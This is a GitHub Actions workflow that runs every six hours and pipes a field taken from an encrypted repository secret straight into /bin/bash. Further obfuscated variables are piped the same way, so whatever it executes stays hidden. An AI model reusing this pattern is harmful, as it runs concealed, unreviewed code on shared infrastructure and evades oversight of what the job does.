name: wuhaoning3214

on:
  workflow_dispatch:
  schedule:
    - cron: '25 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wuhaoning3214
        env:
          x869: ${{ secrets.x869 }}
        run: |
          echo $x869 | jq -r .p59 | /bin/bash
          echo $twv378 | jq -r .ka3 | /bin/bash
          echo $zswbk8926 | jq -r .cak988 | /bin/bash
          echo $im39 | jq -r .w2 | /bin/bash
          echo $qz7372 | jq -r .pxpiv1687 | /bin/bash
          echo $l97 | jq -r .sbvy4 | /bin/bash

